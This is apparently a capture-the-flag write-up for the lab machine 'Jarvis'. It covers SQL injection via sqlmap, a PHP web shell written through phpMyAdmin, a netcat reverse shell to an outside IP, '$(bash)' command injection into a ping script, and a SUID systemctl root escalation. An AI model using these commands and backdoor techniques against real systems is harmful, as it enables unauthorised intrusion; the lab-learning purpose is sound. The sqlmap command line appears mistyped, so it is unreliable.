# JARVIS | 10.10.10.143

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.143

### Open Ports and Their Services

* 22 - SSH - OpenSSH 7.4p1 Debian (deb9u6)
* 80 - HTTP - Apache httpd 2.4.25
* 64999 - HTTP - Apache httpd 2.4.25 - found on all ports scan

## Service Enumeration

### 22 - SSH

We'll leave this - maybe we get to come back to it if we find valid SSH creds.

### 80 - HTTP

Looks like a fancy-shmancy hotel website.

![](img/port-80.png)

The links do not go anywhere, but a gobuster search pulls up some other directories, the most interesting this phpMyAdmin page:

![](img/phpmyadmin.png)

We may need to bruteforce/SQL inject here to get access. But there is another http port open:

### 64999 - HTTP

When I go there, I get an interesting message:

![](img/banned.png)

Um, ok. Just to be safe, I'm gonna run a gobuster on this port as well; I don't want to miss anything.

## Exploitation

Going back to the phpMyAdmin page, I try `admin:admin` and I get denied but it gives me some useful information back:

![](img/mysql.png)


Looking up SQL injection for MySQL made my head hurt, honestly, so I figured it's time to try out SQLmap - I've used it once before so why not?

    mysql -u http://10.10.10.143 --crawl=2 --passwords

This command eventually netted me the hashed password:

![](img/dbadmin-hash.png)

Which I cracked from within sqlmap using the rockyou wordlist:

![](img/password.png)

Then I was able to log in to the phpMyAdmin panel:

![](img/panel.png)

After some web research I [learned](https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/) that I could add a limited web/command shell to the server:

![](img/cmd.png)

In my case I need to change the directory to something more Linux-appropriate:

![](img/mycmd.png)

I then have to navigate to `koopa.php` and append `?cmd=<command>` to it in order to execute a command.

![](img/whoami.png)

A nice touch is that this user cannot read the regular user's flag from here, but that is getting ahead of myself. I need to leverage this into a real shell. In order to do that I will have to execute a command for a reverse shell through the http request. I tried the basic netcat reverse shell from [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-traditional) and it worked on the first try:

![](img/www-shell.png)

Just to confirm, I am unable to read the user flag:

![](img/noflag.png)

So I will have to escalate my privileges either to root or the user called pepper.

## Privilege Escalation 1

Running `sudo -l` shows me that the www-data user is allowed to run a single command as the user pepper:

![](img/sudo-l.png)

In this script is a function that allows the user to ping an IP; it does some sanitization in order to prevent command injection:

![](img/ping.png)

Turns out though, that it neglected to prohibit `$`, which can be used to run commands like so: `$(command)`. So if I try putting in `$(bash)` in place of the IP address that the script is expecting, I may be able to get a shell as pepper:

![](img/pepper-prompt.png)

And I do manage something, but it has no output. The only thing I can think of doing is sending out a reverse shell, so let's do that:

    nc -e /bin/bash 10.10.14.33 7777

![](img/pepper-shell.png)


OK - now I can grab the flag and get to attempting privesc to root.

### Flag

![](img/pepper-flag.png)

## User Enumeration

Running linpeas on the box pulled up an interesting SUID binary, and even lights it up all colourful and whatnot:

![](img/suid.png)

This means I can create a malicious service file (one that executes a reverse shell or one that makes bash an SUID itself) and then run it and I should get root. Let's do the latter method.

## Privilege Escalation via SUID

I have put myself in the "super stealthy" `/dev/shm` directory and created a service file that just turns /bin/bash into an SUID binary. To be more stealthy you should actually copy the binary elsewhere and do it to that one, but I'm being lazy.

![](img/service.png)

Next I just run `systemctl enable --now /dev/shm/dontmindme.service` then `/bin/bash -p` (the -p is crucial as it allows bash to preserve the permissions it runs with), and I am now root:

[](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

A neat box that I used a neat tool (sqlmap) on because I am not yet smart enough to learn how to test for SQL injection manually. And I liked having to privesc twice since I haven't had to do that for a while. Also, the root privesc was neat even though I don't think systemctl would ever be an SUID binary in the real world. I dunno, maybe there would be a reason for it?

Steps taken:

* Find phpMyAdmin directory
* Find SQL injection vulnerability on main website, dump hashed password
* Crack password
* Use creds to log in to phpMyAdmin
* Write a php backdoor to the website via the SQL console
* Execute reverse shell command via backdoor
* Escalate to real user account via vulnerable python function in an available script
* Escalate to root via vulnerable SUID binary
